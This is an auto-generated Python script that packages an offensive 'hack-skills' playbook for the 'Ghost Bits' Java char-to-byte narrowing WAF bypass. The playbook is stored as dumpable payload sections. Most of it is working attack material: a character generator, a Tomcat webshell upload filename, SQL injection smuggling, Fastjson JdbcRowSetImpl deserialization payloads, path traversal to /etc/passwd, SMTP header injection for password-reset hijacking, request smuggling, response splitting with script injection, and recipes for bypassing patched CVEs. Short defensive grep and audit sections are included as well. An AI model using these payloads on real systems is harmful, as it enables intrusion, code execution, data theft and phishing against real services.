#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
AUTO-GENERATED from Cybermes skill: hack-skills/ghost-bits-cast-attack

Skill: SKILL: Ghost Bits / Cast Attack — Java char to byte Narrowing Playbook
Desc : >-

Run:  python hack-skills-ghost-bits-cast-attack.py --help
      python hack-skills-ghost-bits-cast-attack.py --list
      python hack-skills-ghost-bits-cast-attack.py --dump <section>
"""
import sys, json, argparse

NAME = 'hack-skills/ghost-bits-cast-attack'
TITLE = 'SKILL: Ghost Bits / Cast Attack — Java char to byte Narrowing Playbook'
DESCRIPTION = '>-'

PAYLOADS = {
    'main': ["name: ghost-bits-cast-attack", "description: >-", "Java \"Ghost Bits\" / Cast Attack playbook (Black Hat Asia 2026). Use when", "attacking Java services where 16-bit char is silently narrowed to 8-bit byte", "to bypass WAF/IDS for SQL injection, deserialization RCE, file upload", "(Webshell), path traversal, CRLF injection, request smuggling, and SMTP", "injection. Affects Tomcat, Spring, Jetty, Undertow, Vert.x, Jackson,", "Fastjson, Apache Commons BCEL, Apache HttpClient, Angus Mail, JDK", "HttpServer, Lettuce, Jodd, XMLWriter and re-enables many \"patched\" CVEs", "through WAF bypass."],
    'skill-ghost-bits-cast-attack-java-char-to-byte-narrowing-playbook': [],
    '0-related-routing': ["Ghost Bits is a *bypass* primitive that re-enables payloads from many other", "playbooks. Pair it with whichever attack family applies:", "- [waf-bypass-techniques](../waf-bypass-techniques/SKILL.md) \u2014 when a Java", "backend is suspected and WAF rules block the literal payload, this is the", "first technique to try beyond classic encoding.", "- [deserialization-insecure](../deserialization-insecure/SKILL.md) \u2014 for", "Apache Commons BCEL ClassLoader and Fastjson `\\u`/`\\x` escape variants.", "- [path-traversal-lfi](../path-traversal-lfi/SKILL.md) \u2014 Spring, Jetty,", "Undertow, Vert.x URL decoding and `%2>` hex folding.", "- [upload-insecure-files](../upload-insecure-files/SKILL.md) \u2014 Tomcat", "`RFC2231Utility` `filename*` Webshell upload.", "- [request-smuggling](../request-smuggling/SKILL.md) \u2014 Apache HttpClient", "`<= 4.5.9` (HTTPCLIENT-1974/1978) header CRLF.", "- [crlf-injection](../crlf-injection/SKILL.md) \u2014 Angus Mail / Jakarta Mail", "SMTP injection and JDK HttpServer response splitting.", "- [sqli-sql-injection](../sqli-sql-injection/SKILL.md) \u2014 Jackson `charToHex`", "table-lookup truncation hides SQL keywords inside Unicode escapes."],
    'advanced-reference': ["Load [PAYLOAD_COOKBOOK.md](./PAYLOAD_COOKBOOK.md) when you need:", "- Full byte-to-Ghost-character lookup table covering every printable ASCII", "byte 0x20\u20130x7E and the most useful control bytes (0x00, 0x09, 0x0A, 0x0D).", "- Per-component affected version matrix and patch identifiers.", "- Yaklang and Python one-liner payload generators (for `poc.HTTP`,", "`codec.Encode`, raw socket).", "- \"Multi-view normalization engine\" pseudocode for blue-team WAF detection."],
    '1-one-minute-mental-model': ["Java's `char` is a **16-bit** unsigned integer (UTF-16 code unit). Almost", "every wire protocol \u2014 HTTP/1.1, SMTP, Redis RESP, file paths, raw byte", "streams \u2014 is **8-bit** byte oriented. The right way to bridge them is", "explicit charset encoding:", "// Correct: explicit UTF-8, multi-byte chars become multi-byte sequences", "byte[] bytes = str.getBytes(StandardCharsets.UTF_8);", "out.write(bytes);", "Tons of legacy code, framework internals, and \"fast path\" optimizations skip", "this and silently narrow:", "// Dangerous: high 8 bits silently dropped", "byte b = (byte) ch;          // 0x966A -> 0x6A", "out.write(ch);               // ByteArrayOutputStream.write(int) keeps low 8 bits", "dos.writeBytes(str);         // DataOutputStream loops char->byte cast", "int v = ch & 0xFF;           // explicit low-byte mask", "The lost high 8 bits are the **Ghost Bits**. They turn a multi-byte", "Unicode character into a single attacker-chosen ASCII byte at the protocol", "layer.", "View A (string layer: WAF / business validation / logs)", "sees: \u966a \u962e \u4e25 \u7075 \u760d \u760a ...   \"harmless Unicode garbage, allow\"", "v       silent narrowing somewhere in the call stack", "View B (byte layer: protocol / file system / parser / class loader)", "sees: j  .  %  u  \\r \\n ...  \"executes the dangerous semantics\"", "The boundary is breached at the exact moment \"view A\" and \"view B\" disagree.", "Mathematical formulation: to make View B see byte `T`, pick any", "`k in 0x01..0xFF` and use:", "c = chr((k << 8) | T)", "That gives you **255 candidate Unicode characters per dangerous byte** \u2014", "plenty of room to dodge any signature-based blacklist."],
    '2-three-root-cause-families': ["The Ghost Bits umbrella covers three distinct underlying bugs. Distinguishing", "them tells you both *which payload shape* to send and *what to grep for* in", "source."],
    'family-a-real-high-bit-truncation-classic-ghost-bits': ["The narrowing is literal and unconditional.", "```java", "// Pattern A1: explicit cast", "byte b = (byte) ch;", "// Pattern A2: bitwise mask", "int v = ch & 0xFF;", "int v = ch & 255;", "// Pattern A3: OutputStream.write(int) keeps low 8 bits only", "out.write(ch);", "baos.write(ch);", "// Pattern A4: DataOutputStream.writeBytes(String) iterates chars,", "//             writing low byte of each", "dos.writeBytes(str);", "// Pattern A5: deprecated APIs that still exist in old code", "String.getBytes(int srcBegin, int srcEnd, byte[] dst, int dstBegin);", "new StringBufferInputStream(str);", "raf.writeBytes(str);", "Typical impact: Tomcat `filename*`, Apache BCEL ClassLoader, Lettuce Redis", "writer, SMTP CRLF in Angus Mail, HTTPCLIENT-1974 header injection."],
    'family-b-bit-arithmetic-folding-illegal-char-becomes-legal': ["A \"fast\" hex / base64 / charset decoder uses bit tricks instead of strict", "range checks, so an illegal character collapses onto a legal one.", "```java", "// Jetty TypeUtil.fromHexDigit (simplified)", "private static int fromHexDigit(char c) {", "int x = c & 0x1F;          // keep low 5 bits", "x += (c >> 6) * 25;", "x -= 16;", "return x;                  // expected 0..15, but no range check", "Worked example: feed `>` (0x3E):", "0x3E & 0x1F = 0x1E = 30", "(0x3E >> 6) * 25 = 0", "30 + 0 - 16 = 14 = 0xE", "So `%2>` is silently parsed as `%2E` = `.`. The same algebra makes `%2^`,", "`%2~` etc. equivalent to other hex digits.", "Typical impact: Openfire CVE-2023-32315, GeoServer CVE-2024-36401, generic", "URL-decode WAF bypass."],
    'family-c-lax-unicode-normalization': ["The decoder accepts Unicode characters that happen to be classified as", "\"digit\" or that map to a hex value via a `& 0xFF` lookup \u2014 even though they", "were never meant to participate in protocol parsing.", "```java", "// Fastjson: too permissive", "Character.digit(c, 16);   // accepts Thai, Punjabi, fullwidth digits", "// Jackson: index by low 8 bits into an ASCII-only table", "return sHexValues[ch & 0xff];", "// Generic: fullwidth normalization", "// '2' (U+FF12) -> '2', 'e' (U+FF45) -> 'e'", "Typical impact: Fastjson `\\u` and `\\x` escape bypass, fullwidth URL-encoded", "path traversal, Jackson `charToHex` SQLi smuggling."],
    '3-character-generator': ["Build any Ghost Bits character on the fly. This is the single function every", "agent should keep in mind:", "```python"],
    'python': ["def ghost(target_byte: int, k: int = 1) -> str:", "\"\"\"Return a Unicode char whose low 8 bits equal target_byte.\"\"\"", "return chr(((k & 0xFF) << 8) | (target_byte & 0xFF))"],
    '255-candidates-per-byte-e-g-for-0x2e': ["candidates = [ghost(0x2E, k) for k in range(1, 256)]"],
    'u-962e-prefixed-etc': ["```yak", "// Yaklang (for poc.HTTP / fuzz)", "func ghost(targetByte, k) {", "return string(rune(((k & 0xFF) << 8) | (targetByte & 0xFF)))", "ghostJ = ghost(0x6A, 0x96)   // returns \"\u966a\"", "Selection guidance:", "- Avoid surrogate range `0xD800..0xDFFF` (high byte 0xD8..0xDF) \u2014 those are", "not valid scalar values and will be replaced by the JVM string decoder", "before reaching the narrowing site, defeating the bypass.", "- Prefer characters that survive the application's own charset round-trip", "(Latin-Extended, CJK Unified Ideographs, Enclosed CJK Letters and Months,", "Hangul). If the request body uses UTF-8, these all encode cleanly into", "multi-byte sequences that no WAF rule recognizes as `.`, `/`, `j`, etc.", "- Rotate `k` between requests so signature based learning cannot pin a single", "character to a single attack."],
    '4-dangerous-byte-to-ghost-character-map': ["Compact red-team weaponization table. For every byte the attacker actually", "needs, one verified Unicode char is given; substitute another `k` if the WAF", "later learns the example.", "Workflow tip: keep the ASCII `\u013f`, `\u0227`, `\u023c`, etc. variants for tight HTTP", "header contexts (one byte UTF-8 expansion stays smaller); use CJK like `\u962e`,", "`\u966a`, `\u4e25` when you want to bias the WAF \"this is just text\" classifier."],
    '5-per-component-payload-recipes': ["Every recipe shows the dual view: what the WAF inspects vs. what the backend", "actually executes. This is the only reliable way to explain *why* the payload", "goes through."],
    '5-1-tomcat-rfc2231utility-file-upload-webshell-family-a': ["Trigger: any endpoint that accepts multipart upload and Tomcat parses", "`Content-Disposition: ... filename*=UTF-8''...`. Tomcat's RFC2231 decoder", "casts each non-percent character directly to byte, dropping the high 8 bits.", "Payload:", "Content-Disposition: attachment; filename*=UTF-8''1.\u966asp", "Combine with traversal characters from section 4 (`\u962e`, `\u4e2f`) when the upload", "target directory is fixed but the application accepts a `filename*`."],
    '5-2-apache-commons-bcel-classloader-rce-family-a': ["Trigger: any sink that resolves a class name through `BCEL` (`$$BCEL$$...`)", "or any code that decodes BCEL via the `JavaReader` -> `ByteArrayOutputStream`", "loop.", "Vulnerable shape:", "```java", "ByteArrayOutputStream bos = new ByteArrayOutputStream();", "JavaReader jr = new JavaReader(new CharArrayReader(userChars));", "while ((ch = jr.read()) >= 0) {", "bos.write(ch);     // low 8 bits only", "Attack: wrap each byte of the malicious BCEL bytecode into a Unicode", "character whose low 8 bits equal that byte. The decoded byte stream is a", "valid BCEL class; the WAF sees a long blob of CJK text without `$$BCEL$$`", "keywords or class signatures.", "Defense for blue team: a WAF inspecting BCEL must replicate the", "`bos.write(ch)` semantics on each character before pattern matching."],
    '5-3-jackson-chartohex-sqli-smuggling-family-c': ["Trigger: any Jackson-parsed JSON field whose value is later embedded in SQL", "or another parser. Jackson resolves `\\uXXXX` digits via:", "```java", "private static final int[] sHexValues = new int[128];", "public static int charToHex(int ch) {", "return sHexValues[ch & 0xFF];   // mask first, lookup second", "Any non-ASCII character whose low 8 bits land on a populated index returns", "that hex digit. The WAF sees gibberish; Jackson reconstructs an ASCII payload.", "Payload (smuggle the digit `1` for a UNION column count):", "```json", "{\"q\": \"\\u\u4e30\u4e30\u8033\u5931 union select 1,2,3 -- \"}", "Pair with [sqli-sql-injection](../sqli-sql-injection/SKILL.md) for the", "downstream UNION / boolean / time-based payload templates."],
    '5-4-fastjson-u-and-x-escape-bypass-families-b-c': ["Two independent surfaces:", "(a) `\\u` escape \u2014 `Character.digit(c, 16)` accepts Unicode digit categories", "beyond ASCII (Thai `\u0e50-\u0e59` U+0E50..U+0E59, Punjabi `\u0a66-\u0a6f` U+0A66..U+0A6F,", "fullwidth `\uff10-\uff19` U+FF10..U+FF19).", "```json", "{\"\\u\uff14_type\": \"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\": \"ldap://x\"}", "WAF view: `\\u\uff14_type` (no `@type` literal). Fastjson normalizes fullwidth", "`\uff14` to `4`, then handles `_` via the `\\x` shortcut below, yielding `@type`.", "(b) `\\x` escape \u2014 Fastjson computes `digits[x1] * 16 + digits[x2]`. An", "illegal hex character returns the default value 0.", "\\x4_   ->   '4'(=4) * 16 + '_'(=0) = 0x40 = '@'", "```json", "{\"\\x4_type\": \"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\": \"ldap://x\"}"],
    '5-5-spring-jetty-undertow-vert-x-url-decoding-families-a-b': ["Two combinable tricks:", "Trick 1 \u2014 Family A character substitution in path or query:", "/api/v1/data?file=\u962e\u4e2f\u962e\u4e2fetc\u4e2fpasswd", "= ../../etc/passwd at the byte layer", "Trick 2 \u2014 Family B `%2>` folding when Jetty's `TypeUtil.fromHexDigit` is in", "the chain:", "/setup/setup-s/%2>%2>/log.jsp", "= /setup/setup-s/../log.jsp after decode", "Either alone bypasses most signature WAFs; combined they survive even", "\"normalized then matched\" rules that only see ASCII percent triplets.", "Spring CVE-2025-41242 chain (`StringUtils.uriDecode` patched in PR #34673):", "input :  \u962e\u4e25\u7075\u4e30\u4e30\u7532\u6765", "(.)(%)(u)(0)(0)(2)(e)", "narrow:  .%u002e", "decode:  ..", "result:  arbitrary file read via path traversal"],
    '5-6-angus-mail-jakarta-mail-smtp-injection-family-a': ["Trigger: any application that builds SMTP envelopes or headers from", "user-controlled strings. Internal `ASCIIUtility` does:", "```java", "byte b = (byte) ch;           // 16-bit char silently narrowed", "Smuggle CRLF as `\u760d\u760a`:", "hacker@evil.com\u760d\u760aSubject: Password reset code\u760d\u760aTo: target@victim.com\u760d\u760a\u760d\u760aYour code is 1234", "Real impact pattern: Jira-style (CVE-2025-57733) password-reset hijacking,", "Confluence domain allowlist bypass \u2014 pair with", "[crlf-injection](../crlf-injection/SKILL.md) for non-mail CRLF reuse."],
    '5-7-apache-httpclient-4-5-9-request-smuggling-family-a': ["HTTPCLIENT-1974 / HTTPCLIENT-1978: header values pass through", "`OutputStreamWriter` plus a narrow-cast write that emits raw `\\r\\n` for", "`\\u760D\\u760A`.", "X-Auth-Token: 1\u760d\u760aPOST /admin HTTP/1.1\\r\\nHost: internal\\r\\nContent-Length: 0\\r\\n\\r\\nGET /public HTTP/1.1", "Cross-reference [request-smuggling](../request-smuggling/SKILL.md) for", "chosen-prefix attacks once the desync is confirmed."],
    '5-8-jdk-httpserver-response-splitting-cve-2026-21933-family-a': ["Reflection of user input into a response header passes through", "`com.sun.net.httpserver` writers that low-byte-cast each char.", "Payload (URL parameter or upstream header):", "Custom: Cu\u760d\u760aContent-Type: text/html\u760d\u760aContent-Length: 33\u760d\u760a\u760d\u760a<script>alert(1)</script>", "Server emits two logical responses; the second carries an attacker-chosen", "body. Escalates to stored XSS, cache poisoning, and SSO redirect chains."],
    '5-9-other-affected-components': ["Same Family A primitive, different sink:", "- **Lettuce (Redis client)** \u2014 command injection by smuggling `\\r\\n` into", "RESP frames; chain to arbitrary `CONFIG SET dir` + `SAVE` for SSRF-to-RCE.", "- **Jodd `FileNameUtil`** \u2014 path traversal via `\u962e` and `\u4e2f` because its", "internal write loop narrows.", "- **XMLWriter** \u2014 tag-name injection when an attribute or text node value is", "pushed through a low-byte writer; XXE / XSS pivot.", "- **ActiveJ HTTP** \u2014 CRLF injection identical in shape to 5.7 / 5.8.", "- **Vert.x HTTP body parser** \u2014 Family A in `MultipartParser`.", "See [PAYLOAD_COOKBOOK.md](./PAYLOAD_COOKBOOK.md) for affected-version", "matrix and full per-component payload skeletons."],
    '6-known-cve-bypass-recipes': ["Use these *exactly when the corresponding CVE is patched but a WAF still", "fronts the service*. Each Payload below shifts the original ASCII attack into", "a form that survives string-based WAF rules."],
    'openfire-cve-2023-32315-auth-bypass-family-b': ["Original public bypass:", "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp", "Ghost Bits / `%2>` folding bypass (much harder to signature):", "GET /setup/setup-s/%2>%2>/%2>%2>/log.jsp", "Each `%2>` collapses through Jetty's lax hex into `%2E` = `.`, yielding the", "same `../../` traversal without ever emitting `..` or `%2e` to the WAF."],
    'geoserver-cve-2024-36401-rce-via-runtime-keyword-family-b': ["Public WAF rules typically block `Runtime`. Inject one folded character:", "Ru%6>time", "Decoder math: `%6>` -> `%6E` -> `n`. The expression evaluator now sees", "`Runtime`, the WAF never did."],
    'spring4shell-cve-2022-22965-class-loader-chain-family-a': ["Required parameter prefix `class.module.classLoader...`. WAFs block the", "literal `class`. Substitute via low-byte chars:", "Content-Disposition: form-data; name*=\"\u3e63\u0c6c\u1661\u2473\u2473.module.classLoader.resources...\"", "Springs's parameter-name resolver narrows back to `class`."],
    'spring-cve-2025-41242-arbitrary-file-read-family-a-family-b-mix': ["Already demonstrated in 5.5 above. Payload `\u962e\u4e25\u7075\u4e30\u4e30\u7532\u6765` ->", "`.%u002e` -> `..` after decode-after-validation."],
    'jakarta-mail-cve-2025-57733-jira-style-mail-hijack-family-a': ["to=victim@org.com\u760d\u760aSubject: Reset code\u760d\u760aTo: attacker@evil.com\u760d\u760a\u760d\u760aYour code is 1234", "The mail leaves the company SMTP server with valid SPF / DKIM / DMARC, but", "its `To:` and `Subject:` are attacker-chosen \u2014 high-fidelity phishing."],
    '7-detection-decision-tree': ["Use this when triaging a target. The point is to avoid Ghost Bits when it", "cannot help and to *always* try it when the preconditions hold.", "Is the backend Java? (Server header, error page, JSESSIONID, .do/.action,", "WebGoat-style stack trace, X-Powered-By, X-Frame-Options", "with Tomcat default values)", "\u251c\u2500\u2500 No  -> stop, Ghost Bits does not apply", "\u2514\u2500\u2500 Yes", "\u251c\u2500\u2500 Is there a WAF / IDS or input filter blocking your literal payload?", "\u2502   \u251c\u2500\u2500 No  -> use the literal payload; Ghost Bits is overkill", "\u2502   \u2514\u2500\u2500 Yes -> continue", "\u251c\u2500\u2500 Which sink are you targeting?", "\u2502   \u251c\u2500\u2500 File upload via multipart  -> recipe 5.1 (Tomcat filename*)", "\u2502   \u251c\u2500\u2500 JSON deserialization       -> recipes 5.3 (Jackson) / 5.4 (Fastjson)", "\u2502   \u251c\u2500\u2500 Class loader / BCEL ref    -> recipe 5.2", "\u2502   \u251c\u2500\u2500 URL path / parameter       -> recipe 5.5 + Family B `%2>`", "\u2502   \u251c\u2500\u2500 Header reflection          -> recipes 5.7 / 5.8", "\u2502   \u251c\u2500\u2500 Mail send                  -> recipe 5.6", "\u2502   \u2514\u2500\u2500 Redis / RESP / XML / RPC   -> recipe 5.9", "\u251c\u2500\u2500 Probe with a single non-destructive substitution first", "\u2502   (replace ONE character with its Ghost variant; observe response", "\u2502    diff: status code, length, header echo, error message, time)", "\u2514\u2500\u2500 If observable difference appears -> escalate by substituting all", "blocked characters and chain", "through the linked playbook."],
    '8-sast-code-audit-signatures': ["Three priority tiers when reviewing Java source. Search across all your", "project repos, all dependencies you can shade, and the `lib/` of any", "deployed appliance."],
    'tier-1-direct-narrowing-family-a': ["\\(byte\\)\\s*\\w+", "&\\s*0[xX][fF][fF]", "&\\s*255", "\\.write\\(\\s*[a-zA-Z_]\\w*\\s*\\)         # OutputStream.write(int)", "writeBytes\\s*\\(", "StringBufferInputStream", "String\\.getBytes\\s*\\(\\s*int", "RandomAccessFile.*writeBytes"],
    'tier-2-lax-hex-digit-decoding-families-b-c': ["Character\\.digit\\s*\\(", "fromHexDigit", "convertHexDigit", "fromHex\\s*\\(", "uriDecode", "URLDecoder\\.decode", "sHexValues\\[", "& 0x1F\\)\\s*\\+\\s*\\(.*>>.*\\) \\* 25"],
    'tier-3-high-risk-wrappers-and-reachability': ["RFC2231                # Tomcat / mail filename* parsing", "JavaReader             # BCEL ClassLoader reachable", "ASCIIUtility           # Jakarta Mail / Angus Mail", "LineParser             # HttpClient header parser", "ChunkedDecoder         # request smuggling adjacent", "charToHex              # Jackson", "encodeUTF8             # candidate for char->byte writer", "Per-finding triage applies the **five-dimension risk model**:", "Risk formula:", "attacker-controlled  +  check-before-narrow  +  result-in-protocol-syntax", "+  later-redecoding", "= HIGH SEVERITY"],
    '9-differential-testing-workflow': ["A reproducible, black-box procedure to find new Ghost Bits sinks (red team)", "or to validate a fix (blue team).", "1. Pick one dangerous byte T at a time (e.g. 0x2E for '.').", "2. Generate the candidate set:", "C = { chr((k << 8) | T) for k in 1..255 }", "Drop surrogates 0xD8XX..0xDFXX.", "3. For each candidate c in C:", "a. Send a benign request with c at the chosen position.", "b. Send the same request with literal T at the same position.", "c. Compare four observables:", "- status code", "- response body length", "- response body content hash (or diff)", "- server-side log line (if available)", "4. If any candidate produces a response equivalent to T but differs from a", "\"neutral\" character (e.g. 'X'), you have found a narrowing sink.", "5. Repeat for the next T in your priority list:", "0x2E ('.'), 0x2F ('/'), 0x25 ('%'), 0x40 ('@'),", "0x0D ('\\r'), 0x0A ('\\n'), 0x6A ('j'), 0x73 ('s'),", "0x6C ('l'), 0x61 ('a'), 0x63 ('c'), 0x22 ('\"'), 0x27 (''')", "6. Cluster sinks by component (response Server header, error stack) \u2014 one", "sink usually implies the whole framework version is vulnerable.", "This workflow is intentionally protocol-agnostic; the same loop works on a", "file uploader, a search endpoint, a mail composer, or a Redis-backed cache."],
    '10-defense-awareness': ["Five layers, all needed; any single one is bypassable in isolation.", "Blue-team smell tests:", "- Logs contain CJK / Latin-Extended characters at positions where the", "protocol grammar expects ASCII (filename, header value, mail address).", "- The HEX dump of a request contains bytes outside `0x20..0x7E` adjacent to", "protocol delimiters.", "- A pen-test or scanner reports a \"weird 200\" that the security monitoring", "did not flag \u2014 Ghost Bits is the most common 2025-2026 cause for that", "pattern in Java stacks."],
    '11-quick-reference-key-payloads': ["```text"],
    'ghost-char-generator': ["ghost(T, k) = chr(((k & 0xFF) << 8) | (T & 0xFF))     # avoid k in 0xD8..0xDF"],
    'tomcat-filename-webshell-upload': ["Content-Disposition: attachment; filename*=\"UTF-8''shell.\u966asp\"     # \u2192 shell.jsp"],
    'bcel-classloader-bypass-concept': ["$$BCEL$$<each-byte-of-class-file-wrapped-in-a-Unicode-char>"],
    'jackson-sqli-smuggling': ["{\"q\":\"\\u\u4e30\u4e30\u8033\u5931 union select 1,2,3-- \"}                          # \u2192 \"1 union select\u2026\""],
    'fastjson-type-smuggling': ["{\"\\x4_type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://x\"}"],
    'spring-url-decode-jetty-2-folding': ["GET /api/data?file=\u962e\u4e2f\u962e\u4e2fetc\u4e2fpasswd", "GET /setup/setup-s/%2>%2>/log.jsp", "GET /api?cmd=Ru%6>time"],
    'spring4shell-name-class-smuggling': ["Content-Disposition: form-data; name*=\"\u3e63\u0c6c\u1661\u2473\u2473.module.classLoader...\""],
    'spring-cve-2025-41242-path-read': ["GET /resources/\u962e\u4e25\u7075\u4e30\u4e30\u7532\u6765/secret.properties                    # \u2192 ../%u002e"],
    'angus-mail-jira-mail-hijack': ["From: hacker@evil.com\u760d\u760aSubject: Reset\u760d\u760aTo: victim@org.com\u760d\u760a\u760d\u760aYour code is 1234"],
    'apache-httpclient-4-5-9-smuggling': ["X-Auth-Token: 1\u760d\u760aPOST /admin HTTP/1.1\\r\\nHost: internal\\r\\nContent-Length: 0\\r\\n\\r\\nGET /public HTTP/1.1"],
    'jdk-httpserver-response-splitting-cve-2026-21933': ["?ref=Cu\u760d\u760aContent-Type:text/html\u760d\u760aContent-Length:33\u760d\u760a\u760d\u760a<script>alert(1)</script>"],
    'sast-first-pass-grep': ["grep -RnE '\\(byte\\)\\s*\\w+|& 0[xX][fF][fF]|writeBytes|baos\\.write\\(\\w+\\)' src/", "grep -RnE 'Character\\.digit|fromHexDigit|charToHex|uriDecode' src/"],
    'references': ["- Black Hat Asia 2026 \u2014 *Cast Attack: A New Threat Posed by Ghost Bits in", "Java*. Speakers: Xinyu Bai (@b1u3r / @iSafeBlue), Zhihui Chen (@1ue).", "Contributor: Zongzheng Zheng (@chun_springX).", "- Real-world CVEs re-enabled: GeoServer CVE-2024-36401, Spring4Shell", "CVE-2022-22965, Openfire CVE-2023-32315, Spring CVE-2025-41242, Jakarta", "Mail CVE-2025-57733, JDK HttpServer CVE-2026-21933, Apache HttpClient", "HTTPCLIENT-1974 / HTTPCLIENT-1978.", "- Patched components to upgrade past: Apache Commons BCEL >= 6.12.0,", "Fastjson 2.x latest, Apache HttpClient >= 4.5.10 (or migrate to 5.x),", "GeoServer >= 2.28.3, Openfire >= 5.0.4. Confirm vendor advisories before", "relying on any single version number."],
}

def main():
    ap = argparse.ArgumentParser(description=DESCRIPTION, formatter_class=argparse.RawDescriptionHelpFormatter)
    ap.add_argument("--list", action="store_true", help="list sections")
    ap.add_argument("--dump", metavar="SECTION", help="dump payloads for a section")
    ap.add_argument("--search", metavar="KEYWORD", help="search payloads")
    args = ap.parse_args()
    if args.list or not (args.dump or args.search):
        print("=== %s ===" % TITLE)
        print(DESCRIPTION)
        print()
        print("Sections (%d):" % len(PAYLOADS))
        for k in PAYLOADS:
            print("  -", k, "(%d payloads)" % len(PAYLOADS[k]))
        if args.list:
            return
    if args.dump:
        if args.dump not in PAYLOADS:
            print("Section not found. Available:", list(PAYLOADS.keys()))
            sys.exit(1)
        for p in PAYLOADS[args.dump]:
            print(p)
        return
    if args.search:
        q = args.search.lower()
        hits = 0
        for k, v in PAYLOADS.items():
            for p in v:
                if q in p.lower():
                    print("[%s] %s" % (k, p))
                    hits += 1
        print("\n%d hits" % hits)
        return

if __name__ == "__main__":
    main()